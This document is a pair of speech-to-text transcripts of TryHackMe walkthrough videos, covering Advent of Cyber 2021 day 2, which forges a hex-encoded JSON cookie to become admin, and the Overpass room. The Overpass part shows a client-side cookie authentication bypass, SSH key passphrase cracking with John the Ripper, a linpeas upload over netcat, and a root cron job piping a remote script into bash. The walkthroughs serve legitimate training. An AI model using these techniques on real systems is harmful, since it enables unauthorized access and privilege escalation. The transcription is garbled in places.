tryhackme配置教程

in this video we're gonna take on the tri hack me advents of cyber three， 2021 edition， day two and without further ado， let's just kind of dive into it you know so hey， i do have to apologize guys i'm sorry， i'm not in costume anymore the vibe the illusion， the artifice of christmas spirit and halta sheer is gone it has abandoned us， but we at least still have some fun with the advent deciber here at trihacme so， hey， i'm over at trihacme com christmas over on my screen here if you scroll down as you haven't already you can join for free join the room aoc and get ready to play we got the ball rolling just yesterday for the trihacmy advent of cyber to day to task， so only numbers at this point never mind i'm not gonna say that edit that part out if you haven't seen the introductory video or the kickoff video that i help kind of put together for this trihacmy advent of cyber event you can find that on my channel and i hope you enjoy anyway， let's get to the good stuff we just finished up the day one to save the gifts activity but now we're moving on it to the day two elf， hr problems and the story behind this give me a little bit i will read through the story and just cover all this high level stuff so if you're already a wizard if you're already a guru already know what we're talking about here feel free to skip forward in the video but if you are a hey someone new getting starting to feel the cyber security let's let's learn what we can learn together here this is mcskinney needs to check if any other employee elves have left or been affected by the grinch industries attack， but the systems that hold employee information have been hacked can you hack them back to determine if the other teams in the best festival company have been affected and here are learning objectives understanding the underlying technology of web servers and how the web communicates we also have understand what cookies are and their purpose learn how to manipulate and manage cookies for malicious use we are gonna be doing some cookies stuff we are gonna be doing some web http kind of like hey internet computers networking right here but it's gonna be a lot of fun it says https for your computer to en web sever to communicate with each other an intermediary protocol is required this is where http or the hypertext transfer protocol steps in the http protocol is a client to server protocol to provide communication between a client and a web server now web servers just another computer just way out here in the back that still kind of saying hey， i have information to give you i have pages i have results that you want to see and i can hand them to you you being the client and you as the client you just sort of you ain't you're on the phone right you're calling up the web server and the web server answers and they say hey yep， i've got all the information that you need that's the role between the client and server kind of do out there when you as the client start to call them up on the phone you make an http request and that request is crafted and it's kind of has a couple of special properties right it has a method and a target and now the method is what you want to do with this webs over here？ do you want to get information or do you want to post something over there to the site those will always be included the target header specifies what to retrieve from the server and the method specifies how when retrieving information from a web server it's common to use the get method such as like hey loading a picture retrieving a picture literally actually take a look at this when we were requesting this tri hack me page right here we had gotten this file included this nice little christmas star here and we got we sent a get request to retrieve that image file so that's a good thing to know it happens all the time and you'll be able to see it once we kind of get in the weeds here on what this challenge i just has us doing here when retrieving information it's common to use the yet method such as loading a picture and when you send data to a web server it's common to use a post method such as sending log in information like you trying to log in and authenticate to use this website before you're uploading your profile picture or you're changing your profile description that is all sent in a post request because you are giving the webs of your information to now do new things with it once the server receives a request it'll send back a response including any requested content if successful and a status code the status code is to tell the client you me us how the web browser interpreted the request the most common successful code is http 200 status ok that's what you'll see if things went well if you called them up they answered the phone and you were able to retrieve get or actually set or post the information that you wanted to so here's an example you can see this is the raw http protocol here and take a look this is a you can see that header just right there and then hey， maybe the server information again who were calling up on the phone when you make this request how you want to receive it and then down below here i'll go ahead and changes to a different color so it's a little bit more readable this is the content that you would retrieve as part of that request that's the message right the raw data the protocol itself is only one small piece of the puzzle once content is retrieved from the web server your browser needs a way to interpret and render the information scent that's right this is just structure this is all the bones and the skeleton like the blueprint that makes up the information that you might see from the web page， but it's not all the pre pictures of the flashing colors and animations right web applications are commonly formatted in html the hypertext market language year， but it's rendered and styled in css or the cascading style sheets javascript another client side language actually client side doesn't it runs in your web browser， but dynamic it's scripting and something that could be used to add dynamic functionality and cool features to a web page in today's web environment， the use of web frameworks has significantly increased in popularity most modern web applications use many web frameworks and other web solutions that an end user doesn't even have to see or interact with now that could be ruby on rails that could be laravel that could be jango that could be flask that could be i guess express right for the node jonas group fanboys for more information about http request methods and headers check out the web fundamentals room let's hop over there web fundamentals is they know the tri hack me room that you could explore and work through it's super good i want to go verify and check it is a free room so hey， if you aren't subscribed to try hack me you could still jump in play and kind of get a good idea what's going on in that activity but now let's move on now let's talk about something fun and something cool cookies here cookies are how authentication really works it's the bare bones， it is the vessel， it is literally the core and raw structure of how you can log in and the website knows that you're actually logged in and you are who you say you are this is all because http right here， http is a stateless protocol and what that means is that it doesn't keep track of the previous communication that was done you're calling up on the phone to your buddy turns out your buddy has amnesia， he doesn't remember anything that you just said past what you just said so you have to kind of have a secret message or something part of and included in every single thing that you say so it knows oh， oh， oh， i'm talking to buddy or whatever， that's the use of cookies here so when you send request to a web server the server cannot distinguish your requests from somebody else's and let's imagine you're the omnishic server and you're getting phone calls from like everybody phones are ringing off the hook to solve the stateless problem and identify different users and access levels the web server will assign cookies and create a manage a stateful session between the client and the server cookies are like tiny pieces of data or metadata， right and information locally stored on your computer that are sent over to the server when you make a request again so i was saying hey， that's the kind of secret code when you're calling up the server and you say hey， 123792 this is john and then it knows who you are and what you're doing because you were able to authenticate and you passed it the cookie a secret special token the thing is you don't want other folks to know what that cookie is you don't want them to know your secret pasco you don't want them to know that little token that could be used to say you are who you say you are cookies can be assigned any name and any value allowing the web server to store any information that it wants today we'll be focusing on offensication cookies also known as session cookies authentication or session cookies are used to identify you and what level of access you have for your session so here below is a diagram describing an assigning and using a cookie from the initial request to the session request so this is going to be fun i'm going to be able to draw all over this and kind of make a mess here check it out here's the client over on the side let's see if my pan wants to work oof oof we did our best skies i don't know why epic pen always tends to lag over here but of course you have your client the web browser on left hand side and you already know hey， this is our server here now as this happens and it goes sequentially right you make one htt p request you can see this is a post request right here we go ahead and post hey， i want to log in with this username and this password and that works oh my can actually draw better heroes here so the server goes on and says cool cool cool cool cool！ i see who you are i know who you are now i'm gonna say cool dude set this cookie so i actually have an understanding of who you are and that way we know as we're talking to each other here's the secret code so that you can be who you want to be barbie girl now now that this user is authenticated they go do whatever they want to do on the actual application we'll go and say hey， i want to go make changes in the admin portal， so they'll send a get request to go receive that page and because it is including the cookie here here let's try a little picture let's try a little do i have a circle yeah here's my cookie it just looks like a donut looks like a yellow donut i don't have any good like cookie， colors and then the server comes back and he's like sweetman i know who you are i can see your cookie you've got the secret passcode check it out here's all the information that you wanted because it was able to determine you are who you say you are based off of the cookie and that's that explanation hope that was fun to begin the process and when you send a request such as a login request your browser sends us information blah， blah， blah this is everything that i just discovered and talked about there is one good thing here it says when the server receives your get request and cookie it'll locate and sometimes desirialize your session d sirilization is the process of taking data from a given format like json， json， the javascript， object， notation and then rebuilding it as a logical object or some kind of data format that a computer programming language， maybe php， maybe python， maybe javascript， whatever， it can actually read an interpret and understand it's not just a flat boring chunk of letters and numbers right because that's just a data representation we want to bring into a form that our programming language knows how to work with if all of that succeeds the web server goes ahead and responds as it does over the phone with a 200 aok thumbs up， you're good here's your stuff now the winter saying what cookies are on how they're used for let's dive into their contents ooh okay now i gotta be honest i gotta be completely honest here cookies are made up over 11 different components 11 and that's a lot and some folks maybe you're like dude can count all those things on my hand i have ten fingers， but i know that i need 11 because of that so many components in a cookie each component of the cookie whether it's a name value domain path expire set size secure the same site etc i would venture to say unless you're doing some crazy hardcore which crafting voodoo stuff you don't need to know all of the ins and outs of the you know stuff beyond this i'm saying i'm saying i think really the name in the value are the most important pieces that you will mess with as you tinker with and explore cookies all of this stuff maybe maybe maybe sometimes you need to worry about it not always so if you are willing if you don't mind press the i believe button with me and that way you don't have to overwhelm yourself in thinking bro， i don't want to memorize and study and make flash cards for the 11 different components of cookies i got to be honest sometimes it's just the name and value that really mean the most here， but of course the domain is like hey， where is it actually set for a specific website in the path where is it okay to be used when the cookie expires is just an kind of important thing， but the size htb only some of these might not always need to be in the weed with you should know that they exist right because they are settings and they are values for a specific cookie， but be that as it may or whatever， whatever， idiom you say to wrap up a thought that you don't know how to wrap up looking at all the components a cookie may seem intimidating there's no need to worry his attackers oh try hack me just said this try hack me taking the words right out of my mouth cookie components are always preps in pairs the main pair is that name and value that's the most important part right will define the name of the cookie and the value of the name the second pair is the attribute value pair this defines an attribute of the cookie and the value of the attribute that's actually setting it here when you're using a set cookie header in an http request or response right from the web server， the web server saw said way back here they were like hey， we're setting it cookie with this web server response all of that information that you just saw below is what's gonna be included in there just here now the thing is cookies are stored locally as in you carry them with you right you you're the client of course so what if you could tamper with and change that cookie and then when you give it back to the server when you're calling the server up on the phone you say hey， remember how i used to be bill bob now， i'm joe schmo because i know the pascode 72918 and the servers like cool dude and that's the idea that's how you can manipulate cookies and you could do specific stuff you could get unintended behavior determined by the web developer that's why you don't want to have your cookie shared， but if you are acting as the adversary， you know you're putting your hacker hat on you kind of want maybe to get access to someone else's cookies because then you could access their session and access their pages on a web server that's the idea that's the gist there now you could do this in your web browser like you can just straight up do this in firefox， chrome， edge internex floor safari， opera i don't know i don't know you're up through these days brave is that what all the cool kids are using developer tools can be accessed by pressing f12 or control shift i on your keyboard in your web browser there is a little extra extra fun features called the developer tools or sometimes the browser tools this developer tools are open to access your cookies navigate to the storage tab in firefox or application tab and chromer edge select the cookies drop down on the left hand side and this is everything that you might be looking at when you're working on a page storage application and the cookies tab we'll kind of set all that here for you cookie values might seem random at first so ever they often have an coded value or meaning behind them that can be decoded to a non arbitrary value like a javascript object like jason kind of as we were discussing before from attackers perspective you can decode the cookie value to identify the underlying objects once you've identified the underlying objects you can modify them to whatever you want like again hey， the account name that you're trying to log in with bill bob changed to joe schmo is there an is admin premier like a true or fall or a one or a zero that says hey are you a super user on this website totally change that you can resend the cookie back and if the web server interpretates it understands it maybe you got access below as a summary of how cookie values can be manipulated obtain a cookie value like a regular normal one when you're calling up the server on your phone just registering and signing up for an account if you decode that cookie value identify the obvious notation of the structure of of the cookie and then change the parameters inside the object to a different parameter with a higher privileged level like admin or administrator right kind of that idea i was just mentioning now if you re encode the cookie back to what the server is expecting because it needs to be able to know that this cookie hasn't been changed or tampered with it wants to look as similar to a normal and regular cookie as it could like i'll bring this back to the actual case of cookies look if you try to bring grandma， chocolate， chip cookies and all of a sudden you had oatmeal cookies given back to you you're like what the heck this isn't this isn't what i would have expected in this transaction here they know something nefarious is going on or they just can't handle it maybe grandma's allergic to oatmeal cookies or something i don't know and then you do something with the cookie you let it invoke itself you let the server handle it and read it oftentimes done by refreshing the page because and it forces the server when you make another get request hey， can you tell me what's going on little process and do all of it if you want to learn more about all about that there are some other rooms in trihacmy http， and detail or other authentication bypass challenges and different trihacmy rooms let's go take a quick peek at some of those this is the web fundamentals one down below we have hdp in detail and i will store down the very bottom also again a free room fantastic authentication bypass mmm that's a subscribe one okay okay so hey， just know what you're getting into if you're tackling some of those other fun extracurricular triac me rooms， but now let's get on to the challenge let's get on to our task here what we are actually trying to accomplish let me go ahead and close out those other tabs because i do want to be able to open up this new one here it says open the static site in a new tab here all right so that's this link go ahead and click on that and this is the web page i am greeted with the best festival monitoring with some log in or sign up form and i get some snow flex falling could i turn the snowflakes off no， it's just a facade just a lie just like me what i put on santa's costume so we open it up we register and account and verify the cookies using the developer tools in your browser alright， so hey let's go ahead and say john hammond password please subscribe oh and i need to actually sign up right thank you thank you lastpass use that password manager guys please subscribe and let's just say john and john com great to count here we go uh oh， so google chrome wants me to save this password try last pass wants me to save this password it says hey you don't have permission to register on account currently please contact in a minisator for more assistance did i get a cookie though so if you wanted to as try hack me mention you you can hit f12 on your keyboard or hit ctrl shift i on your keyboard or you could very well right click and do like an inspect element and that will pop up a the notion here of the developer tools now i'm going to go way way over to the side here because there are going to be something that we particularly want to see is this this isn't i want to verify what i just said was a okay， yeah， so this opens some other things when i hit control shift i when i hit f twelve it's still the developer tools being opened i am probably dumbo and not seeing wear storages， but i suppose it's under the application tab right， so if we go to application and then we go to cookies can i expand this and let's see yeah there is a static labs trihacmidoc cloud entry there ooh， so this is a kind of connection that we have set up we see a list of cookies with their name and value over here one of these is for font awesome and the other as you can see for the domain here is for static labs tri hackney cloud now this value you can see down below my face is just about in the way but it's a lot of letters and numbers seemingly these are more numbers and they are letters and interestingly all the letters are a through f which sounds a lot like hexadecimal i don't know if tri hackney's gonna maybe give us that clue， but we did see hey， that's we found our cookie it says what is the name of the new cookie for your account so that was user auth right， we were able to see that right over here and now if we go back we can submit that i'll hit enter what encoding type was used for the cookie value there is a hint here in case you didn't know but i'm gonna take a guess that that is hexadecimal yeah， okay cool， what would that hint have been if we wanted to click on that use cyber chef to decode the value ooh okay let me let me fire up a cyber chef link there we go if you wanted to if you just genuinely had no idea what the heck we were looking at i'll copy this this cookie right here right click select it all and copy by bring it into cyber chef if folks aren't familiar with cyber chef cyber chef is an incredible tool to be able to do different things with data represented in different way and you can stack a lot of different operations whether it's whatever you want it to be then you can clear this out or manipulate them or move them around and see the input and output like rapidly so that's a ton of cool stuff that you can do with this cyber chef is super duper handy it's all online totally free so hey， if you want to do you can explore different recipes and see what the output is basics he fours not it and two is like doing the operation in one direction from is doing it the other operation in the other direction so like in coding versus decoding if we wanted to decode this cookie it says hey， we could convert a hexadecimal bite string back into its raw value they give an example here all these and let's take that here we go the hexadecimal representation is just a number system right it's base 16 rather than base ten like we normally count in and use in our language which is base base ten right zero to nine this time it's zero to nine with an a through f in hexadecimal just like you saw up here in the input there we go we have company the best festival is registered equals true username is john hammond， so that's it this looks like the same representation that we saw above and this as trohackme had mentioned the structure with the curly braces kind of wrapping around it let's see they had another example here json right this is that structure and i'll zoom in just a tad on that to focus on that when you see the curly braces and when you see kind of a key value being set with the colon to another actual value， age， colon 50 eye color， colon blue whatever that structure is json each of these are actually kind of represented and separated by a comma here you can see that after each entry but that is just a method in its way to store data it doesn't actually mean anything it's not code you can't execute it it's not gonna run you're not compiling or running any json but it's a representation to show data in information and that's why they literally call it the object notation because it's the notation it's how it's presented and would stored so that's json javascript object notation we could manipulate the cookie and try and bypass the login portal what's the value of the administrator cookie if we try to change our username to admin so let's go back to cyber chef and do that let's say our username if we kind of took this output here down below i'm actually gonna do something weird i'm gonna remove everything from input and clear out my cyber chef operations and i'm gonna paste it in here so that now we could modify and tinker with what we actually want to change here and manipulate this cookie let's change that username to admin typing that in and let's change this two hexadecimal now you can see this could take a delimiter here you could click on this and change it because this is full of spaces we don't want any spaces so let's change that deliminator to not and now i have this big long string here double click in right click and copy and pasting and let's go give this back try hack me here's the value it's submit and that's correct now let's go back to our cookie editor here in our developer tools on the static website and let's try to right click a cookie and edit that name or edit that value here so i could slap this in replace it just like that and we could see that that was able to be changed and manipulated down below now if i were to refresh the page you could click on the refresh button in your web browser or you could hit 5 or whatever， i really really recommend almost everyone when you're trying to refresh a web page hit ctrl shift r that makes like a hard refresh without cashing any information in the background so any pages that you previously requested and your web browser knows hey， i don't need to request those again because i already requested them no， no， no it tells your web browser look i'm gonna request everything no matter whether or not i've seen it before and that will kind of give everything a clean slate so if you've done any manipulating like changing your campering your cookie control shift r pulls it all back down fresh let's do that on the keyboard real quick ooh did i miss did i make a mistake very very likely let's check out my user off okay no， it is the correct thing but i don't know if i've actually told the server hey， i want to set that cookie let's go verify that one more time we've made this cookie if i wanted to go back to the homepage oh， yeah this is trying to do some like get request i want to go back to the actual homepage there we go okay so， that was just kind of a an idiosyncrasy at the very very top of the web page i may have changed the value for the cookie， but it was still taking me to a page that wasn't trying to log in or or get me anywhere it was already telling me hey， you can't log in because it saw in the url from those get parameter values hey， you are not allowed to log in so all right so we have some operations or some teams here that seem to be either responding or not responding i'm assuming this green is good as a status red is not and yellow it could be something else i know these actions i don't know what those are let's let's go back to the room first see what we're doing here team environment is not responding that is hr could submit that team environment has a network warning oh， that's finance so hey， listen i i i might have just steamrolled over probably the most important part what we did just then when we manipulated that cookie is ultimately in a authentication bypass and that's the danger right when when you either know someone else's cookie or you could figure it out because it's represented in such a weak and easy way like you shouldn't find yourself with web servers that will just have json encoded data that you could easily manipulated and tinker with we didn't have to know the admin password we didn't have to change or modify our permissions we literally just changed our name to admin and that's a weakness that's a serious flaw on the web servers perspective us is the client us is the you know acting as the adversary puttin on her hacker hat that's something that we could use and abuse， but it's this is the learning point this is the value when we kind of see hey， jason and the in the cookie we can manipulate and change that cookie and ultimately you have that power even as the client， even as the end user that's not a server side thing you can change that so there's the danger in that all right hey， we've got all of this figured out here sorry it looks like it is the application operation or that team that is having trouble here with their connectivity looks like i can click on stuff but it doesn't do anything i guess that's i guess that's the speed test but hey， let's go and answer that application is a team it's having a bad time and if you want to learn more about any authentication bypasses we should just trying out this room application bypass tasks yet released each day and progressively harder yep kind of as we knew from yesterday come back tomorrow for day three's task where namsack will be recording a video walkthrough ooh， he's quite a fellow he's quite a handsome man that's gonna be a ton of fun thanks so much for hanging out everybody this has been the day two task for the tri hack me advent at cyber 3 or 2021 addition and we learned a lot you know there's a lot of reading there's a lot of learning a lot of cookies http， stuff but boy oh boy did we get into some good stuff and i hope you had fun i hope this was educational i hope this was entertaining and i hope it's keeping you happy， healthy and excited for the tri hack me adventive cyber 3 we're having a ton of fun i'm pretty excited about all the upcoming rooms and there are just so much activities for the holiday season like everyone's doing a ctf everyone's doing a great game， everyone's doing some fun， cyber security learning and i guess we're just gonna have to completely neglect in our friends and family because i'll just we just want to hang out on the keyboard do some ctfs thanks so much for watching everybody i love you i'll see you in the next video take care。

hello， everybody my name is john hammond welcome back on the youtube video we're still looking at some trihac me， so let's hop on over to my screen and get to it i want to showcase the overpass room because i just kind of found it and i thought it was really kind of interesting a neat idea i also saw there is overpass 2 that is out right now and i want to pour into that but first， we got to get through with the starting things so this theme or the kind of prompt for this box is what happens？ when some broke computer science student makes a password manager， i have already submitted flags for this， so please forgive me and that those are visible there， but we'll divide as how to get to those and find them as we always do so it says obviously it's a perfect commercial success whenever computer science students try to make a password manager and there's also a little easter egg they say there is a tri hack me subscription code to hidden on this box first person to find an activate will get one month subscription for free if you're already subscriber， you can just give the kotaway and do some good stuff， but that has already been claimed this room is about a month old i realize my face is kind of in the way， so you can't see that mess ups there but anyway， we have our machine ip address it's up and it's running and i'm connected to the vpn so let's get started and try and work with it i will make directory for youtube overpass so we have a place to work and i'll get started with an n map scan well， we kind of put together our notes document so n map tach sc for default scripts tack sv to search reversions tack o n so i end map output to a simple n map format and of course， i'll paste in the ip address all right while that's running let's make a simple read me file so we can kind of keep track of things i tend to do that just because it's good practice sometimes， while i'm doing this video i might just sort of forget please forgive me it is currently august 18th， 2020 and i'll slap my name in there maybe if you just end up like throwing this in github or something you're just sharing your notes and your repository who knows what you're working on？ we'll just go ahead and copy these prompts here slap them in good enough easy peasy i realized there is a like tri hack me api that you could use it's like a library and python and i need to tinker with that because i want to write a script that could do something like this and for larger rooms that have like more information in them because that way you'll just automatically have this read me and you don't have to really work with much we've got some interesting stuff open our end map scan is up in an accessible so let's check that out looks like the port 22 open so classic ssh looks like it's running a new bun 2 and a port 80 http it's going interesting you don't often see that very cool okay looks like that's it looks like we only have those two ports just to be safe let's turn off those save scripts or whatever those are and let's run our all port scan with tack p tack all those there we go let's get started to run that and let's explore that web page well， we know that that's a thing all right just opening up the ip address in our web browser， it says welcome to overpass a secure password manager was support for windows， linux， macos and more this is interesting， because you like actual like relatively somewhat of a web page here people are used the same password for multiple services if you're one of them， you're risking your accounts being hacked by evil hackers overpass allows you to secure different passwords for reservice protector using military grade cryptography to keep you safe oh yeah okay！ passwords ever transmitted over the internet in any form unlike passer managers overpass does not store your passwords unlike other passer managers download overpass today all right let's check out the source i just hit control you on my keyboard to do that looks like they are loading like local javascript and console log hello world so if i were to go back to the page and check out the console tab yep you can see that guy right there nice cool great！ i'm also gonna take a look at the css file in case they hide anything in there， i think that's kind of good practice just something good to do images i'm not extremely concerned about if we kind of run out of things to do we could do like cheesy stego on that or some other reconnaissance but oh there's an html coma here yeah right！ just because the romans used it doesn't make it military grade change this oh okay！ romans using secure cryptography that hints towards like rot 13 and caesar ciphers right so okay that's clearly not incredibly strong cryptography there's a downloads page so let's go check check that out up on over here stay safe against hackers use overpass oh and have pre compile binaries and they have the source code nice okay！ anything else in this overpass go build scripts these are all like a specific directory oh what's not about us page sorry before i forget i just kind of want to keep looking around anything here in this source nope nothing hiding oh i like that simax is in there ninja cool！ oh this is really cool！ all the try hack me guys i love it great okay！ let's take a look at this code that they're showcasing here source code and build script let's look at this thing i already have these files downloaded that's embarrassing they're still in my downloads folder who cares illusion art artifice let me make a directory for like source and let's move downloads overpass dot source yeah stop go！ sorry into here same thing with build i still have the the binary itself gotta say it should put that in here as well， so let's take a look at those let's take a look at the source code over pasco and it's written go kind of neat i wish i were smarter and go i wish i could just like write go like as well as i could write python because that language is crazy cool！ it's able to do stuff like everywhere other than the like scripts and binaries being like megs and size but okay it looks like a passless entry is a structure so it has a name， password and a function for rot 47 excellent！ the secure encryption algorithm， blatantly ripped and stolen from this url okay， incredible！ i will press the i believe button on that and say that that that just does regular rot 47 at least for now if it does do anything else and we just don't see it then whatever we don't we don't need to wear with it we can go ahead and reverse engineer it as needed save preds to file where does it save all these does it have a path like a default path load dreads from file jason input oh python style input function neto service search password for service i'm just kind of like slowly cursory looking through these to get an idea for kind of what these functions are on what they do？ i don't think like there's no obvious glaring like okay bad eval or unsafe function that might be sticking out， but it's good to kind of peruse through this delete password from service how does it do that pass not found print all passwords and it just loops through all of them okay oh cred's path is in the home directory dot overpass good to know and that's probably stored in some like martialized or whatever jason format as we saw up top okay and we have this menu here and just little command line interface to answer or select one option that's pretty easy enough they did have the binaries so we could just kind of tinker with it and play with it let's do that oh what was that build script？ sorry before i forget build script on a siege go os or goose which is always fun that's in go setting an environment variable for how to install it and work with it over pasco is it just do it for like literally everything that's awesome and and echo date hack our builds completed oh， it's just kind of like command and crayman substitution in there to get the date maybe we could potentially abuse that at some point obviously we're just like we've downloaded this locally， but we are supposed to get into this box somehow so we should mess with that all right whatever let's take a look at the binary you can download it i have already downloaded it i'm just gonna grab the linux one it didn't download because i didn't click it hard enough apparently， but i still have the binary doing it or so let's move that in here and let's look at it it is i realized typing at the bottom of my screen might annoy you sorry like that is executable overpass linux and run it there we go yeah let's let's just hop over into another window up here so i'm not at the very bottom of my screen because i heard something some people say like hey， i don't like to read it because the youtube play stuff gets in the way so here we go welcome to overpass retrieve a password for a service one john that's it it died okay retrieve all passwords john oh again！ this also still exists because of my home directory dot overpass man i'm really ruining the illusion here right so this is rod 47 this is the weird notation that it's apparently encrypting and storing all the stuff in keep note you can normally identify rot 47 by the weird random sheer amount of punctuation works and i'll just do a simple stupid online rot 47 decoder slap that in decrep okay so now you might be able to see i have john john john is the name and john is the password super boring but that's how it would simply work oh okay！ so now that we've looked at this code and we've looked at this source we've looked at this build script we looked at the executable i don't see a whole lot else here and since they give us like an actual website sometimes you like oh wait whoops i for i was spent so much time exploring a website that i forgot to run my regular normal enumeration procedures so don't forget fire up that simple neto i'll tell you that to neto dot log if i can type right， also do the same with little go buster we'll do a go buster dur attack you with that url and we'll use a w for my word list and then i store the directory list medium over my op directory and we will fire that off okay， we'll see what that comes up with realistically we probably should have been running that while we were looking for oh did it fail and that htb client is that the right that is the right ip address can i ping that thing oh sorry yep is it just because nito is working that's funny air running goobster i don't know if you can see that typo there nice let's do it again maybe i'll stop need to let go bus or have a little bit of precedence here still dies all right let me pause and feed us up well， you know what it might be that annoying n map scan beating it up maybe i don't need a last lasting forward slash let's see if that will work there we go all right turning off the mf scan just kind of let it do its thing that's fine about us downloads img we saw that already oh a slash admin that is something we had not seen or looked at before so let's hop over there slash admin minister access looks like rene credentials please log in to access this content okay we could try the basic stupid admin admin that doesn't work admin password that doesn't work we could try for basic stupid sql injection or one equals one oh using two hyphens to do a sql light comment using a hashtag or an octothorpe to do it with the sql syntax my sql syntax switching it up to a single quote or a double quote for strings none of those work okay is there anything on this page it's interesting body on there another css file okay nothing there interesting anyway， main js as usual oh but there's a login dot js and a cookie dot js that's peculiar what is that cookie？ oh okay！ that's just a regular mini if i library use another place of js cookie mit license so that might not be too interesting for us how about login js okay， yeah！ this looks custom this looks like it's just written specifically for this so we have a post data function with a url data responsive weight fetching a url with the post method ctrls headers url form encoded follow it a redirect get the body and then return the response okay！ sometimes it's not always jason that's peculiar in code form data that looks like it just kind of puts it into like a yeah like okay post data format onload which is just we saw on the source code that would like run as soon as the page loaded okay would look for a login on you clicking submit it will run login function rather than submitting the form as html normally would so this login function is where all the interesting stuff happens okay！ we have a username box which is getting all the information out of that field same thing with passwords， same thing with login text content equals nothing creds is just going to be a little dictionary associative array hash table with the values pulled from the fields and we will post to that resource api login with our creds and it'll get a constant status or cookie with a response object from that post data function returning okay and then we do a check on client side code in javascript so if the status or cookie is equally equal to incorrect credentials then we know that failed gotcha or otherwise huh oh we set a cookie session token session status or cookie window location okay so it brings us to the exact same page it just has a cookie working but that's interesting because what could that value be obviously？ if it's just not like incorrect credentials， it could just be like literally anything right like what what could that be if we were to set that would that work if we just set that to like anything literally we could control that because a cookie is something we can tamper with just as easily let me try that in curl so let's make go buster shut up and let's try to close out some of these because we don't need these to take up the entire terminal for us let's hop over to the original page right and and let's try and curl that just to get it in the command line i don't have like a cookie editor thing quickly installed like a cookie editor browser plug in or manager on my firefox or my chrome here so i'm just gonna use a simple curl for a proof of concept i'm gonna specify tag age to use a header will that work i'd have to use like a set cookie thing um i think curl just has like a tattack cookies yeah no cookies is unknown is it cookie yeah cookie requires a parameter okay quick troubleshooting to see if that command line or even actually exists uh so we'll specify what was the name of that session token yeah we'll set it equal to literally anything and we have a private key okay so i guess that did work since it's all javascript we could probably do the exact same thing this code would run in the context of this window， because that's pulling in that cookie js so if i were to open up the console again and just slap this this syntax in status or cookie is not defined that variable we could just set once again like literally anything now if i refresh this page that cookie is set and we can see it in our browser so since you keep forgetting your password james let's set up ssh keys for you if you forget the password for this crack yourself i'm tired of fixing stuff for you also， we really need to talk about this military great encryption nice okay so here's the private key reading that prompt it sounds like we need to crack a password for this thing so let's make a directory for ssh and slap this in here as an idrsa don't forget to include a private key at the excuse me？ include a new line at the very very end of your private key that can trip you up sometimes， if it says like unknown of format or something， let's mark it as our own so ch mod 600 and i'm assuming we'll have a username james because it references this this individual james here so let's grab that ip address and try to ssh tack i with that idrsa james at this ip address not a url please thank you see if that way it'll work for us yep i'm totally cool with connecting to it let's do it we need to pass phrase okay let's do that which on the ripper so i have opt rockyuda text i have this regular word list for brute forcing that's just in my opt directory there's tons and tons of stuff and i also have john the ripper so that's an opt john the ripper run john if you don't have that installed go grab it off of their get up repository it's like magnum ripper john the ripper it's a community edition jumbo john i think it's it's called and then just do it go into the source directory do a dot slash configure and do it make an install and it'll build it all for you so super easy super cool let's run john on actually we need to convert this specific format right because john will offer some scripts like ssh2 john that will use a file format and kind of convert into something that john the ripper could work with so i'll just make a for john dot tex that's good now with that done we can run john on that for john dot tex but let me specify the wordless here i'll use opt rock you that wordless for him and i'll run for john and let's see if he gets a hit and he does okay so james 13 is apparently that password cool cool that's glove fun what are you doing over there john the ripper what are you doing？ let's just stop that actually， because i don't need this extra session when i still have that micaministry connect to it， please and the password should be james 13 good good good to type that right let it connect okay let me pause this video real quick okay that took forever but i have codex unit i'm on the box msshdn so okay in our home directory as this james user i can see a user dot text file which we will clap out here cat that out crap that out all the words and that will give us our points for that user though we also have a little to do text which is interesting update overpass encryption muralin has complaining that it's not strong enough yeah right down my password somewhere on a sticky note so i don't forget it wait we make a password manager why not just use that test overpass for macos it builds？ but i'm not sure it actually works s paradox how we got around？ how we got the automated builds for working and where the builds go？ they're not updating on the website ah automated build script is it still is it like running here because i know we had that thought we could maybe like get in the middle of that date command， running or something not okay whatever let's see if we have a password he mentioned he has been using the password manager and we have an overpass file， okay so that hidden directory again right？ so let's cat out that overpass and we see his information it's simple rot 47 so i had that rot 47 decoder online i could just once again slap that in go name the system pass see dronling picture okay whatever， it system referring to like this system system like would i be able to like pseudo take out like is that his password paste that in okay that is his password but james can't run pseudo boring okay um we could do a regular enumeration what's not is there any other users we get into there's a tri hack me user nope can't get into that anything in root nothing particularly interesting， okay so let's throw like lin， ena or lin peas in here and let's see if we can find a way to around this um i'm going to use gwake which i use as part of my cheesy like poorman's pen test framework ideas because i would like to be able to upload or download a file right so i have these commands like upload file with netcat or like w got or other method to get a file on the box normally if you're using this with pone cat， it's much better and we could get like a pone cat shallow if we wanted to do， but i'll just showcase this one because i think linina might highlight some things a little bit better for your learning and for us to walk through this together so let me show you like what that is before i just totally say that this is what we're going to do and then you don't understand any of it so uh let's fire that up in sublime text i'm using my p m p or opt poor men's pen test functions and that will grab like my ip address my local host ip address so it knows or my tons zero ip address？ excuse me？ so it knows how to reach the vpn in that box back and forth the go random port it'll specify a file name out of this little dollar son excuse me out of this command line argument we pass in will hike wake which is on how i'm using to invoke this and we'll get focused back to our actual window and we will run a netcat listener grabbing this file on our host and then we'll send the command with xte or x automation to simulate typing in on the victim this netcat command to download and pull this file in so that's all that that's doing this silly poor man's pen test because i'm like automating keystrokes inside of my reverse shell so i can quote on quote script inside of it you don't have that real functionality but pone cat will let you do that so i would always recommend to use pone cat but i guess i'm just not in this case stupid me let's upload limpies there we go that slapped in i'm gonna give it a second i'll check okay， yeah！ greek says it's got everything it's done so let me like close out of that and it just threw it in dev shm sure memory because i like to hide in there file that it is a shell script so let's run it and let's dot slash okay！ mark is a cuteable we're get a ton of stuff i'm using kind of the one of the later versions of limpies i think or at least newer than i had ran previously because now it'll cash directories are like be able to figure a lot of good stuff so we'll let that go and then we'll start to look through it i guess we can kind of look through it as it's going so nothing wrong with that limpies we have ping we have netcat incredible old pseudo version good to note kind of exploring and see if there's anything that just jumps out， limpies is great， because it'll color code things that are potentially or very very likely a privilegisculation utility useful software we have a lot python we have 64 all these things we have compilers goodness rudy's running some stuff prawn crons in there why they run a cron i wonder if that's that automatic build script cron jobs has some yeah those are all defaults i look like defaults oh， what is that line？ so that's cronsintex so every minute of every day， every hour of every day， every month as the user root interesting we will curl overpass dot t h m looks like a little host name or domain name download source build script dot s h and pipe it to bash whoa okay funky that is an obvious in egregious method that we could abuse to privilege escalate because if roots running that then we'll get co execution as root if that's just getting piped into bash， can recontroll that though that overpassed thm where they setting that domain name that's normally in its enter hosts do we have right access to it's ever host that's normally a weird thing host name okay yeah！ we can see that host name host in dns that's that's definitely the output of our etc host file but can i write to that that's odd listening port super users are root yep okay try hack me looks like 